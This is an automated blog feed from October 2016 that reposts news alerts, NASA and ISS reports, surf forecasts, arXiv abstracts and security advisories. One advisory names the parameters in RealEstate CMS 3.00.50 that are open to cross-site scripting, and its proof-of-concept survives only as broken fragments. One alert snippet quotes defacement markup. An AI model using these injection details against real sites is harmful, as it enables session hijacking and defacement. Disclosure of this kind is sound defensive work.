Latest YouTube Video

Saturday, October 8, 2016

Join the Anonymous Million Mask March

This is "Join the Anonymous Million Mask March" by cyberaktivist on Vimeo, the home for high quality videos and the people who love them.

from Google Alert - anonymous http://ift.tt/2cZH5ox
via IFTTT

La bella Colomba (Anonymous)

La bella Colomba (Anonymous) ... Composer, Anonymous. Key, E-flat major. Movements/SectionsMov'ts/Sec's, 1 movement. Librettist, unknown.

from Google Alert - anonymous http://ift.tt/2d3gEct
via IFTTT

Atheist ex-nurse forced into Alcoholics Anonymous substance abuse program

A former Vancouver nurse is claiming his rights as an atheist were violated because his employer and union forced him into Alcoholics Anonymous ...

from Google Alert - anonymous http://ift.tt/2d26OrA
via IFTTT

Yahoo Email Spying Scandal — Here's Everything that has Happened So Far

Today Yahoo! is all over the Internet, but in a way the company would never have expected. It all started days ago when Reuters cited some anonymous sources and reported that Yahoo built a secret software to scan the emails of hundreds of millions of its users at the request of a U.S. intelligence service. At this point, we were not much clear about the intelligence agency: the National


from The Hacker News http://ift.tt/2ecjZLm
via IFTTT

The Hydrogen Clouds of M33


Gorgeous spiral galaxy M33 seems to have more than its fair share of glowing hydrogen gas. A prominent member of the local group of galaxies, M33 is also known as the Triangulum Galaxy and lies about 3 million light-years distant. The galaxy's inner 30,000 light-years or so are shown in this telescopic portrait that enhances its reddish ionized hydrogen clouds or HII regions. Sprawling along loose spiral arms that wind toward the core, M33's giant HII regions are some of the largest known stellar nurseries, sites of the formation of short-lived but very massive stars. Intense ultraviolet radiation from the luminous, massive stars ionizes the surrounding hydrogen gas and ultimately produces the characteristic red glow. To enhance this image, broadband data was used to produce a color view of the galaxy and combined with narrowband data recorded through a hydrogen-alpha filter. That filter transmits the light of the strongest visible hydrogen emission line. via NASA http://ift.tt/2d8nO2o

Friday, October 7, 2016

Ocean City, MD's surf is at least 5.18ft high

Maryland-Delaware, October 12, 2016 at 10:00AM

Ocean City, MD Summary
At 4:00 AM, surf min of 4.88ft. At 10:00 AM, surf min of 5.18ft. At 4:00 PM, surf min of 5.32ft. At 10:00 PM, surf min of 5.23ft.

Surf maximum: 6.19ft (1.89m)
Surf minimum: 5.18ft (1.58m)
Tide height: 0.64ft (0.19m)
Wind direction: NE
Wind speed: 10.61 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

Fix anonymous caching incorrect increment of RewriteRule Skip

These are all directly tied to the boost .htaccess generation incorrectly doing an increment on the Anonymous Caching "skip" rewrite rule. Let's take a ...

from Google Alert - anonymous http://ift.tt/2dALI6e
via IFTTT

Blank page after anonymous form submission

Using the anonymous “add event” feature, when someone submits an event anonymously, they get a blank page. When using the same feature ...

from Google Alert - anonymous http://ift.tt/2d0lVSo
via IFTTT

Full-Text PDF

Recently, Farash et al. proposed a lightweight anonymous authentication ... service from a foreign agent, an anonymous authentication scheme is ...

from Google Alert - anonymous http://ift.tt/2d8Y3zf
via IFTTT

2017 Atlantic South Regional Convention

Date/Time Date(s) - May 05, 2017 - May 07, 2017. Location Crowne Plaza Little Rock. Categories. Regional Convention. "Spiritual Experience in the ...

from Google Alert - anonymous http://ift.tt/2dRSbaW
via IFTTT

Ravens: OT Ronnie Stanley (foot) misses third straight day of practice, says he will be a game-time decision Sunday (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

An Enhanced Lightweight Anonymous Authentication Scheme for a Scalable Localization ...

Recently, Farash et al. proposed a lightweight anonymous authentication ... sensor networks, to provide anonymous authentication of sensor nodes.

from Google Alert - anonymous http://ift.tt/2e9qoHk
via IFTTT

Create an anonymous callback function as the second argument to the service method call.

Participate in discussions with other Treehouse members and learn.

from Google Alert - anonymous http://ift.tt/2dELBX3
via IFTTT

ISS Daily Summary Report – 10/06/2016

Fluid Shifts Before, During and After Prolonged Space Flight and Their Association with Intracranial Pressure and Visual Impairment (Fluid Shifts): Following yesterday’s Dilution Measurements, today, the ISS CDR performed Day 2 of his Final Fluid Shifts collection.  With assistance from FE-6, the crew performed various collections and measurements including Optical Coherence Tomography (OCT), Distortion Product Otoacoustic Emissions (DPOAE), Tonometry, and Ultrasounds.  Today’s sessions concluded the CDR’s Fluid Shift activities, as the crew will not be performing Cerebral and Cochlear Fluid Pressure (CCFP) measurements or Chibis/Lower Body Negative Pressure (LBNP) measurements.  The CCFP measurement device was returned on SpaceX-9 for failure analysis, and due to the shortened 47S increment duration, it was determined that the LBNP would not be required.  Both instances of science loss were reviewed and accepted by the payload teams.  Fluid Shifts investigates the causes for severe and lasting physical changes to astronaut’s eyes. Because the headward fluid shift is a hypothesized contributor to these changes, reversing this fluid shift with a lower body negative pressure device is investigated as a possible intervention. Results from this study may help to develop preventative measures against lasting changes in vision and eye damage. Marrow Blood Collection: FE-5, with the assistance of FE-6, performed the fourth and final blood collections in support of the Return minus 30 day (R-30d) requirement.  The samples were spun using the on-board refrigerated centrifuge then stored in Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI) for return on a later flight.  The MARROW study (Bone Marrow Adipose Reaction: Red Or White?) (Marrow) investigation looks at the effect of microgravity on the bone marrow. It is believed that microgravity, like long-duration bed rest on Earth, has a negative effect on the bone marrow and the blood cells that are produced in the bone marrow. The extent of this effect, and its recovery, are of interest to space research and healthcare providers on Earth. Multiomics Collections: FE-5 performed sampling in support of the JAXA MultiOmics experiment.  Various samples are collected and stowed in MELFI four times throughout the crew’s on-orbit duration in addition to a questionnaire and ingestion of fructooligosaccharide (FOS).  The objective of MultiOmics is to understand the gut ecosystem of astronauts in the space environment, especially focusing on the immune dysfunction, and to evaluate the impact of fructooligosaccharide (FOS).  Electrostatic Levitation Furnace (ELF) Troubleshooting: FE-5 performed an ELF Sample Holder exchange to troubleshoot the friction problems seen with previous Sample Holders.  The Electrostatic Levitation Furnace (ELF) is an experimental facility designed to levitate/melt/solidify materials by containerless processing techniques using the Electrostatic Levitation method. With this facility, thermophysical properties of high temperature melts can be measured, and solidification from deeply undercooled melts can be achieved. The ELF is located in the JEM Multipurpose Small Payload Rack (MSPR) in Kibo.  Microgravity Science Laboratory (MSL) Sample Cartridge Assembly (SCA) Exchange: FE-5 performed a sample exchange in the European Space Agency’s (ESA’s) MSL facility.  The crew installed the Batch-2b of the MSL SCA, which serves two projects investigating how different phases organize in a structure when metallic alloys are solidified. The crew observed a scratch on the liquid-metal ring, which allows for controlled cooling of the sample.  Ground controllers had the crew continue with the operations, and they will initiate the experiment run the week of 17 October.  The project Metastable Solidification of Composites (METCOMP) studies the phase formed by the reaction of the remaining liquid phase with an already formed solid, to form a second solid phase on cooling. For this purpose, Bronze (Copper-Tin Alloys) of different compositions will be processed. The other project, Solidification along a Eutectic path in Ternary Alloys (SETA), looks at how two phases that form together organize into lamellar, or fibre, structures when cooling Aluminum (Copper-Silver Alloys). Both projects will provide benchmark samples that will enable to test numerical models that aim to predict these structures. Synchronized Position Hold, Engage, Reorient, Experimental Satellites (SPHERES) Slosh Preparations: FE-6 continued charging batteries and review On-Board Training (OBT) materials in advance of tomorrow’s experiment run.  The crew conducted a conference with the SPHERES-Slosh team. The SPHERES-Slosh investigation examines the way liquids move inside containers in a microgravity environment. The phenomena and mechanics associated with such liquid movement are still not well understood and are very different than our common experiences with a cup of coffee on Earth. Rockets deliver satellites to space using liquid fuels as a power source, and this investigation plans to improve our understanding of how propellants within rockets behave in order to increase the safety and efficiency of future vehicle designs.  Today’s Planned Activities All activities were completed unless otherwise noted. CSA Generic Frozen Blood Collection CSA Generic Refrigerated Centrifuge Configure ENERGY Diet Log of Breakfast SPHERES Battery Swap CSA Generic Sample MELFI Insertion Multi-purpose Small Payload Rack (MSPR) /Group Combustion Module (GCM) Component Activation 2 Download of BRI log from RSS1 Video Recording of Greetings Regenerative Environmental Control and Life Support System (RGN) WSTA Fill In Flight Maintenance (IFM) Waste and Hygiene Compartment (WHC) Full Fill SEISMOPROGNOZ. Downlink data from Control and Data Acquisition Module (МКСД) Hard Drive Health Maintenance System (HMS) Food Frequency Questionnaire (FFQ) FLUID SHIFTS. Ultrasound 2 Power On In Flight Maintenance (IFM) Waste and Hygiene Compartment (WHC) Full Fill FLUID SHIFTS. OCT Setup FLUID SHIFTS. Donning CardioLab Holter SPHERES Payload OBT FLUID SHIFTS. Baseline Ultrasound Scan SPHERES Battery Swap SPHERES Slosh OBT Fluid Shifts Ultrasound Baseline Scan Multi Omics Fecal Sample Operations Multi Omics Fecal Sample MELFI Insertion XF305 Camcorder Setup Electrostatic Levitation Furnace(ELF) Sample Holder Install ISS N2 Repress from Progress 432 [AO] СрПК Section 2 (start) Verification of Kit #1contents for Komparus Fluid Shifts OCT Baseline Exam – Operator FLUID SHIFTS. Assisted Test, Subject FLUID SHIFTS. OCT Equipment Stowage SPHERES Battery Swap ISS N2 Repress from Progress 432 [AO] СрПК Section 2 (end) SPHERES Crew Conference ENERGY Diet Log of Lunch FLUID SHIFTS. Distortion Product Otoacoustic Emission (DPOAE) Baseline Test, Subject Fluid Shifts Tonometry Baseline Setup MELFI Ice Brick Insert Fluid Shifts Tonometry Baseline […]

from ISS On-Orbit Status Report http://ift.tt/2dEv1GM
via IFTTT

London Police Arrest Romanian ATM Hacker Who Stole Millions

A Romanian man has been arrested and charged with conspiracy relating to his involvement in a prolific ATM malware campaign. Emanual Leahu, 30, was arrested in the western city of Bacău, Romania by the London Regional Fraud Team (LRFT) London police run by the City of London Police on Tuesday 20 September, extradited to the United Kingdom last week. Leahu is believed to be a member of a


from The Hacker News http://ift.tt/2dQLZAf
via IFTTT

Ocean City, MD's surf is at least 5.01ft high

Maryland-Delaware, October 10, 2016 at 10:00PM

Ocean City, MD Summary
At 4:00 AM, surf min of 3.37ft. At 10:00 AM, surf min of 3.91ft. At 4:00 PM, surf min of 4.27ft. At 10:00 PM, surf min of 5.01ft.

Surf maximum: 5.61ft (1.71m)
Surf minimum: 5.01ft (1.53m)
Tide height: 0.91ft (0.28m)
Wind direction: ENE
Wind speed: 15.2 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

Verizon wants $1 Billion Discount on Yahoo Acquisition Deal after Recent Scandals

It seems like it is not all over for Yahoo yet. Another day, another bad news for Yahoo! Verizon, which has agreed to purchase Yahoo for $4.8 Billion, is now asking for a $1 Billion discount, according to recent reports. <!-- adsense --> The request comes after Verizon Communications learned about the recent disclosures about hacking and spying in past few weeks. Just two weeks ago, Yahoo


from The Hacker News http://ift.tt/2e7W5Rd
via IFTTT

[FD] NEW VMSA-2016-0015 - VMware Horizon View updates address directory traversal vulnerability



Source: Gmail -> IFTTT-> Blogger

GPM Monitors Hurricane Matthew Nearing Florida

NASA's Global Precipitation Measurement mission or GPM core observatory satellite flew over Hurricane Matthew several times as the category 4 storm headed toward Florida. The GPM Core Observatory carries two instruments that show the location and intensity of rain and snow, which defines a crucial part of the storm structure - and how it will behave. The GPM Microwave Imager sees through the tops of clouds to observe how much and where precipitation occurs, and the Dual-frequency Precipitation Radar observes precise details of precipitation in 3-dimensions. GPM data is part of the toolbox of satellite data used by forecasters and scientists to understand how storms behave. GPM is a joint mission between NASA and the Japan Aerospace Exploration Agency. Current and future data sets are available with free registration to users from NASA Goddard's Precipitation Processing Center website.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2diWzzZ
via IFTTT

GPM Captures Hurricane Matthew Over Haiti

On October 2nd and 3rd, 2016 NASA's Global Precipitation Measurement mission or GPM core observatory satellite flew over Hurricane Matthew. The first pass shows Matthew immediately after it became a category 4 hurricane with sustained winds of 150 mph on October 2nd, 2016. The second pass shows it over Haiti on October 3rd as it buffets Haiti with sustained winds of 140 mph. The GPM Core Observatory carries two instruments that show the location and intensity of rain and snow, which defines a crucial part of the storm structure - and how it will behave. The GPM Microwave Imager sees through the tops of clouds to observe how much and where precipitation occurs, and the Dual-frequency Precipitation Radar observes precise details of precipitation in 3-dimensions. GPM data is part of the toolbox of satellite data used by forecasters and scientists to understand how storms behave. GPM is a joint mission between NASA and the Japan Aerospace Exploration Agency. Current and future data sets are available with free registration to users from NASA Goddard's Precipitation Processing Center website.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2dJewuV
via IFTTT

Thursday, October 6, 2016

Anonymous users are not restricted when roles are set

When enabling page access and selecting "Authenticated user" an anonymous user can still access the page.

from Google Alert - anonymous http://ift.tt/2d7n51J
via IFTTT

HaCkEd By Anonymous Ghost Gaza

The problem that I see is character problems an eccents and special characters and [</title><h1>HaCkEd By Anonymous Ghost Gaza</title>.

from Google Alert - anonymous http://ift.tt/2dyM6Cc
via IFTTT

Human Decision-Making under Limited Time. (arXiv:1610.01698v1 [stat.ML])

Subjective expected utility theory assumes that decision-makers possess unlimited computational resources to reason about their choices; however, virtually all decisions in everyday life are made under resource constraints - i.e. decision-makers are bounded in their rationality. Here we experimentally tested the predictions made by a formalization of bounded rationality based on ideas from statistical mechanics and information-theory. We systematically tested human subjects in their ability to solve combinatorial puzzles under different time limitations. We found that our bounded-rational model accounts well for the data. The decomposition of the fitted model parameter into the subjects' expected utility function and resource parameter provide interesting insight into the subjects' information capacity limits. Our results confirm that humans gradually fall back on their learned prior choice patterns when confronted with increasing resource limitations.



from cs.AI updates on arXiv.org http://ift.tt/2dIQRLh
via IFTTT

Parallel Large-Scale Attribute Reduction on Cloud Systems. (arXiv:1610.01807v1 [cs.DC])

The rapid growth of emerging information technologies and application patterns in modern society, e.g., Internet, Internet of Things, Cloud Computing and Tri-network Convergence, has caused the advent of the era of big data. Big data contains huge values, however, mining knowledge from big data is a tremendously challenging task because of data uncertainty and inconsistency. Attribute reduction (also known as feature selection) can not only be used as an effective preprocessing step, but also exploits the data redundancy to reduce the uncertainty. However, existing solutions are designed 1) either for a single machine that means the entire data must fit in the main memory and the parallelism is limited; 2) or for the Hadoop platform which means that the data have to be loaded into the distributed memory frequently and therefore become inefficient. In this paper, we overcome these shortcomings for maximum efficiency possible, and propose a unified framework for Parallel Large-scale Attribute Reduction, termed PLAR, for big data analysis. PLAR consists of three components: 1) Granular Computing (GrC)-based initialization: it converts a decision table (i.e., original data representation) into a granularity representation which reduces the amount of space and hence can be easily cached in the distributed memory: 2) model-parallelism: it simultaneously evaluates all feature candidates and makes attribute reduction highly parallelizable; 3) data-parallelism: it computes the significance of an attribute in parallel using a MapReduce-style manner. We implement PLAR with four representative heuristic feature selection algorithms on Spark, and evaluate them on various huge datasets, including UCI and astronomical datasets, finding our method's advantages beyond existing solutions.



from cs.AI updates on arXiv.org http://ift.tt/2cXPbsN
via IFTTT

A New Data Representation Based on Training Data Characteristics to Extract Drug Named-Entity in Medical Text. (arXiv:1610.01891v1 [cs.CL])

One essential task in information extraction from the medical corpus is drug name recognition. Compared with text sources come from other domains, the medical text is special and has unique characteristics. In addition, the medical text mining poses more challenges, e.g., more unstructured text, the fast growing of new terms addition, a wide range of name variation for the same drug. The mining is even more challenging due to the lack of labeled dataset sources and external knowledge, as well as multiple token representations for a single drug name that is more common in the real application setting. Although many approaches have been proposed to overwhelm the task, some problems remained with poor F-score performance (less than 0.75). This paper presents a new treatment in data representation techniques to overcome some of those challenges. We propose three data representation techniques based on the characteristics of word distribution and word similarities as a result of word embedding training. The first technique is evaluated with the standard NN model, i.e., MLP (Multi-Layer Perceptrons). The second technique involves two deep network classifiers, i.e., DBN (Deep Belief Networks), and SAE (Stacked Denoising Encoders). The third technique represents the sentence as a sequence that is evaluated with a recurrent NN model, i.e., LSTM (Long Short Term Memory). In extracting the drug name entities, the third technique gives the best F-score performance compared to the state of the art, with its average F-score being 0.8645.



from cs.AI updates on arXiv.org http://ift.tt/2dQfAyZ
via IFTTT

Adaptive Online Sequential ELM for Concept Drift Tackling. (arXiv:1610.01922v1 [cs.AI])

A machine learning method needs to adapt to over time changes in the environment. Such changes are known as concept drift. In this paper, we propose concept drift tackling method as an enhancement of Online Sequential Extreme Learning Machine (OS-ELM) and Constructive Enhancement OS-ELM (CEOS-ELM) by adding adaptive capability for classification and regression problem. The scheme is named as adaptive OS-ELM (AOS-ELM). It is a single classifier scheme that works well to handle real drift, virtual drift, and hybrid drift. The AOS-ELM also works well for sudden drift and recurrent context change type. The scheme is a simple unified method implemented in simple lines of code. We evaluated AOS-ELM on regression and classification problem by using concept drift public data set (SEA and STAGGER) and other public data sets such as MNIST, USPS, and IDS. Experiments show that our method gives higher kappa value compared to the multiclassifier ELM ensemble. Even though AOS-ELM in practice does not need hidden nodes increase, we address some issues related to the increasing of the hidden nodes such as error condition and rank values. We propose taking the rank of the pseudoinverse matrix as an indicator parameter to detect underfitting condition.



from cs.AI updates on arXiv.org http://ift.tt/2cXOuja
via IFTTT

Metaheuristic Algorithms for Convolution Neural Network. (arXiv:1610.01925v1 [cs.CV])

A typical modern optimization technique is usually either heuristic or metaheuristic. This technique has managed to solve some optimization problems in the research area of science, engineering, and industry. However, implementation strategy of metaheuristic for accuracy improvement on convolution neural networks (CNN), a famous deep learning method, is still rarely investigated. Deep learning relates to a type of machine learning technique, where its aim is to move closer to the goal of artificial intelligence of creating a machine that could successfully perform any intellectual tasks that can be carried out by a human. In this paper, we propose the implementation strategy of three popular metaheuristic approaches, that is, simulated annealing, differential evolution, and harmony search, to optimize CNN. The performances of these metaheuristic methods in optimizing CNN on classifying MNIST and CIFAR dataset were evaluated and compared. Furthermore, the proposed methods are also compared with the original CNN. Although the proposed methods show an increase in the computation time, their accuracy has also been improved (up to 7.14 percent).



from cs.AI updates on arXiv.org http://ift.tt/2dQfFCG
via IFTTT

The backtracking survey propagation algorithm for solving random K-SAT problems. (arXiv:1508.05117v4 [cs.CC] UPDATED)

Discrete combinatorial optimization has a central role in many scientific disciplines, however, for hard problems we lack linear time algorithms that would allow us to solve very large instances. Moreover, it is still unclear what are the key features that make a discrete combinatorial optimization problem hard to solve. Here we study random K-satisfiability problems with $K=3,4$, which are known to be very hard close to the SAT-UNSAT threshold, where problems stop having solutions. We show that the backtracking survey propagation algorithm, in a time practically linear in the problem size, is able to find solutions very close to the threshold, in a region unreachable by any other algorithm. All solutions found have no frozen variables, thus supporting the conjecture that only unfrozen solutions can be found in linear time, and that a problem becomes impossible to solve in linear time when all solutions contain frozen variables.



from cs.AI updates on arXiv.org http://ift.tt/1I5Y6A4
via IFTTT

A Discrete and Bounded Envy-Free Cake Cutting Protocol for Any Number of Agents. (arXiv:1604.03655v10 [cs.DS] UPDATED)

We consider the well-studied cake cutting problem in which the goal is to find an envy-free allocation based on queries from $n$ agents. The problem has received attention in computer science, mathematics, and economics. It has been a major open problem whether there exists a discrete and bounded envy-free protocol. We resolve the problem by proposing a discrete and bounded envy-free protocol for any number of agents. The maximum number of queries required by the protocol is $n^{n^{n^{n^{n^n}}}}$. We additionally show that even if we do not run our protocol to completion, it can find in at most $n^{n+1}$ queries a partial allocation of the cake that achieves proportionality (each agent gets at least $1/n$ of the value of the whole cake) and envy-freeness. Finally we show that an envy-free partial allocation can be computed in $n^{n+1}$ queries such that each agent gets a connected piece that gives the agent at least $1/(3n)$ of the value of the whole cake.



from cs.AI updates on arXiv.org http://ift.tt/1Q85mzr
via IFTTT

Extending Unification in $\mathcal{EL}$ to Disunification: The Case of Dismatching and Local Disunification. (arXiv:1609.05621v2 [cs.LO] UPDATED)

Unification in Description Logics has been introduced as a means to detect redundancies in ontologies. We try to extend the known decidability results for unification in the Description Logic $\mathcal{EL}$ to disunification since negative constraints can be used to avoid unwanted unifiers. While decidability of the solvability of general $\mathcal{EL}$-disunification problems remains an open problem, we obtain NP-completeness results for two interesting special cases: dismatching problems, where one side of each negative constraint must be ground, and local solvability of disunification problems, where we consider only solutions that are constructed from terms occurring in the input problem. More precisely, we first show that dismatching can be reduced to local disunification, and then provide two complementary NP-algorithms for finding local solutions of disunification problems.



from cs.AI updates on arXiv.org http://ift.tt/2cMi0u7
via IFTTT

MLB: Man who threw beer at Orioles OF Hyun Soo Kim in AL wild-card game charged with mischief, due in court in November (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

I have a new follower on Twitter


Ali Campbell
Husband / Dad / Youth & Children's Ministry Consultant / Leadership / Mission / Discipleship / @ali_theresource / Read / Write / Draw / Politics || Views Mine
Mid Sussex
https://t.co/Qz9YP0FDxK
Following: 2550 - Followers: 3546

October 06, 2016 at 06:43PM via Twitter http://twitter.com/AliCampbell_68

Orioles: Pitching coach Dave Wallace, 69, retiring after 3 years with Baltimore and 36 in coaching; worked for 7 teams (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

[FD] [KIS-2016-12] Magento <= 1.9.2.2 (RSS Feed) Information Disclosure Vulnerability

--------------------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

Parent/child form for anonymous users

This is a follow up to an existing post. It is closed so I can't respond. http://ift.tt/2dOtdZZanonymous-users/.

from Google Alert - anonymous http://ift.tt/2d6ySx1
via IFTTT

Mac Malware Can Secretly Spy On Your Webcam and Mic – Get This Free Tool to Stay Safe

Apple Mac Computers are considered to be much safer than Windows at keeping viruses and malware out of its environment, but that’s simply not true anymore. It's not because Mac OS X is getting worse every day, but because hackers are getting smart and sophisticated these days. The bad news for Mac users is that malware targeting webcams and microphones has now come up for Mac laptops as well


from The Hacker News http://ift.tt/2dvvkri
via IFTTT

What The Anonymous Visitor Is Telling You: How to Engage the 95% that Don't Convert

95% of anonymous website visitors remain just that - anonymous; they don't convert. The focus of online marketing is on the 5% that do, with the hope ...

from Google Alert - anonymous http://ift.tt/2e5Qj2s
via IFTTT

ISS Daily Summary Report – 10/05/2016

ENERGY (Astronaut’s Energy Requirement for Long-Term Space Flight): Today, FE-5 completed Day 7 of the 11 day ENERGY experiment. In addition to today’s water and urine samples, the 11 day ENERGY experiment requires FE-5 to continue logging his dietary intake and wear the armband that monitors his activities. The Energy investigation measures an Astronaut’s Energy Requirements for Long-Term Space Flight, a crucial factor needed for sending the correct amount of the right types of food with space crews. Astronauts often lose body mass with extended stays in space for reasons that remain unclear, although increased exercise as a microgravity countermeasure may be a factor. Knowing details of astronaut metabolism and activity, combined with other conditions, will help ensure that crews are properly nourished on long missions.  Fluid Shifts: Today, the crew completed Fluid Shifts operations by configuring the Refrigerated Centrifuge for sample load operations, conducting body (blood, urine, and saliva) sample collections and stowing the samples into a Box Module within a MELFI (Minus Eighty-degree Freezer for ISS) Rack. The crew also collected a galley water sample and stow in the MELFI prior to ingestion of a Tracer solution from the Tracer Syringe. Fluid Shifts is a joint USOS-Russian experiment that measures how much fluid shifts from the lower body to the upper body, in or out of cells and blood vessels, and determines the impact these shifts have on fluid pressure in the head, changes in vision and eye structures. Vascular Echo Resting Ultrasound Scan and Blood Pressure Operations: With support from the Vascular Echo ground team, the FE-5 installed the Ultrasound 2 probe and ECG Cable, configured the Ultrasound 2 software and the VOX, and attached the ECG Electrodes, marked the arteries, and performed the ultrasound scans. The crew also performed 3 consecutive blood pressure measurements using the Cardiolab (CDL) Holter Arterial Blood Pressure (BP) Unit. This Canadian Space Agency (CSA) investigation examines changes in blood vessels, and the heart, while the crew members are in space, and then follow their recovery on return to Earth. The results could provide insight into potential countermeasures to help maintain crew member health, and quality of life for everyone. Thermolab Instrumentation for Circadian Rhythms: Today, FE-5 began the first of a three day European Space Agency (ESA) Circadian Rhythms experiment by donning the Thermolab Double sensors which are to be worn for 36 hours. After the measurement was complete, the data was transferred and the hardware was stowed. The objective of the experiment is to get a better understanding of any alterations in circadian rhythms in humans during long-term space flights. Such knowledge will not only provide important insights into the adaptations of the human autonomic nervous system in space over time, but also has significant practical implications by helping to improve physical exercise, rest- and work shifts as well as fostering adequate workplace illumination in the sense of occupational healthcare in future space missions.  At Home in Space Questionnaire: FE-6 completed a questionnaire for the At Home in Space investigation. This Canadian Space Agency (CSA) experiment assesses culture, values, and psychosocial adaptation of astronauts to a space environment shared by multinational crews on long-duration missions. It is hypothesized that astronauts develop a shared space culture that is an adaptive strategy for handling cultural differences and they deal with the isolated confined environment of the space craft by creating a home in space. At Home in Space uses a questionnaire battery to investigate individual and culturally related differences, family functioning, values, coping with stress, and post-experience growth.  Oxygen Generation System (OGS) Inter-Module Ventilation (IMV) Flow Measurements:  This morning the crew performed an activity to remove the Kapton Tape shim from the Velocicalc probe and added Kapton tape shims to the OGS Velocicalc Adapter. It was found in the last use of the adapter that the shim added to the probe resulted in interference when trying to use adapters other than the OGS Velocicalc Adapter. Following this modification, the crew took two measurements of the OGS Cabin Air Inlet. One measurement utilized the OGS Velocicalc Adapter, while the other did not. These readings will be used to compare against each other and calibrate the ground team to previous readings that have been taken at this location.  Cygnus Capture Self Study: FE-5 and FE-6 used Robotic Onboard Trainer (ROBoT) to simulate Cygnus 2 meter approaches, 30 meter approach and Capture Point (CP) Hold.    Crew Quarters (CQ) Solid State Lighting Assembly (SSLA) Installation:  Today, FE-6 installed a SSLA into the Starboard CQ. The SSLAs were designed to replace General Luminaire Assemblies (GLAs) to improve visual acuity and to provide a crew health countermeasure for circadian rhythms, sleep, alertness and performance. To accomplish these goals, SSLAs are designed to operate in 3 modes with 3 distinct spectrum. The different spectrum provide control of the blue portion of the light which impacts melatonin production in humans which impacts sleep. Today’s Planned Activities All activities were completed unless otherwise noted. FLUID SHIFTS. Saliva Test, Subject FLUID SHIFTS. MELFI Urine Sample Insertion FLUID SHIFTS. Urine Collection, Subject FLUID SHIFTS. Basic blood collection, Subject Fluid Shifts Blood Collection – Operator FLUID SHIFTS. Water Collection from the Galley and taking radioisotope marker, Subject Fluid Shifts Refrigerated Centrifuge Configuration ENERGY Diet Log of Breakfast Tropical Cyclone Hardware Closeout FLUID SHIFTS. Conclude Centrifuge Spin SPHERES Battery Setup Fine Motor Skills Experiment Test – Subject ISS CREW/SSIPC CONFERENCE At Home In Space Questionnaire Environmental Health System (EHS) Acoustic Dosimeters – Data Transfer and Stow ENERGY Water Sample FLUID SHIFTS. Urine Collection, Subject Energy Urine Sample Collection FLUID SHIFTS. MELFI Urine Sample Insertion SPHERES Battery Swap FLUID SHIFTS. 3-Hour Blood Collection, Subject Fluid Shifts Refrigerated Centrifuge Configuration FLUID SHIFTS. 3-hour Saliva Collection, Subject FLUID SHIFTS. MELFI Urine Sample Insertion Science Box Locker Prep FLUID SHIFTS. Conclude Centrifuge Spin FLUID SHIFTS. MELFI Urine Sample Insertion FLUID SHIFTS Blood Collection Ultrasound 2 HRF Rack 1 Power On Vascular Echo Leg Cuffs Ultrasound Scan 1 Public Affairs Office (PAO) High Definition (HD) Config JEM Setup Oxygen […]

from ISS On-Orbit Status Report http://ift.tt/2dOsb5u
via IFTTT

[FD] RealEstate CMS 3.00.50 - Cross Site Scripting Vulnerability

Document Title: =============== RealEstate CMS 3.00.50 - Cross Site Scripting Vulnerability References (Source): ==================== http://ift.tt/2dMuqkr Release Date: ============= 2016-10-06 Vulnerability Laboratory ID (VL-ID): ==================================== 1949 Common Vulnerability Scoring System: ==================================== 3 Product & Service Introduction: =============================== RealEstate CMS is a web portal script designed for realty agents , realtor or brokers to sell , buy , trade , rent and letting their client's property through online. It is a web based Content Management System integrated web application platform developed in php, mysql used by real estate companies to promote properties. Feature-rich, SEO-friendly, easy to use interface with Protected admin area to create. (Copy of the Vendor Homepage: http://ift.tt/1Hd4syR ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a cross site scripting vulnerability in the official RealEstate v3.00.50 content management system. Vulnerability Disclosure Timeline: ================================== 2016-10-06: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A client-side cross site scripting web vulnerability has been discovered in the official Realestate v3.00.50 content management system. The vulnerability allows remote attacker to inject own malicious script codes on the client-side of the vulnerable module or service. A client-side cross site scripting web vulnerability is located in the search engine. The web vulnerability could allows an attacker to execute javascript in the web-browser of the user or administrator to compromise session credentials. The injection point of the vulnerability is in the `Add` function with the `property_name`, `property_price` and `post_code` parameters. The execution point occurs in the the search module of the content management system. The request method to inject is POST and the attack vector of the issue is located to the client-side of the web-application. The security risk of the web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.1. Exploitation of the client-side vulnerability requires no privileged web-application user account and low or medium user interaction. Successful exploitation of the vulnerability results in non-persistent phishing, session hijacking, non-persistent external redirect to malicious sources and client-side manipulation of affected or connected web module context. Request Method(s): [+] POST Vulnerable Module(s): [+] Add (Input) Vulnerable Parameter(s): [+] property_name [+] post_code [+] property_price Proof of Concept (PoC): ======================= The vulnerability can be exploited by remote attackers without privileged user account and with low or medium user interaction. For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue. PoC: Source
>" class="form-control">
>" class="form-control"/>
"},

Source: Gmail -> IFTTT-> Blogger

How to Start Secret Conversations on Facebook Messenger

If you are looking for ways to start a secret conversation on Facebook Messenger with your friends, then you are at the right place. In this article, I am going to tell you about Facebook Messenger's new end-to-end encrypted chat feature, dubbed "Secret Conversations," but before that, know why do you need your chats to be end-to-end encrypted? Your online privacy is under threat not only from


from The Hacker News http://ift.tt/2dNNhBi
via IFTTT

A Crumbling Layered Butte on Mars


What is this unusual mound on Mars? NASA's Curiosity rover rolling across Mars has come across a group of these mounds that NASA has labelled Murray Buttes. Pictured is a recently assembled mosaic image of one of the last of the buttes passed by Curiosity on its way up Mt. Sharp -- but also one of the most visually spectacular. Ancient water-deposited layers in relatively dense -- but now dried-out and crumbling -- windblown sandstone tops the 15-meter tall structure. The rim of Gale crater is visible in the distance. Curiosity continues to accumulate clues about how Mars changed from a planet with areas wet and hospitable to microbial life to the dry, barren, rusted landscape seen today. via NASA http://ift.tt/2cSWFNv

GPM Captures Hurricane Matthew Before Haiti Landfall

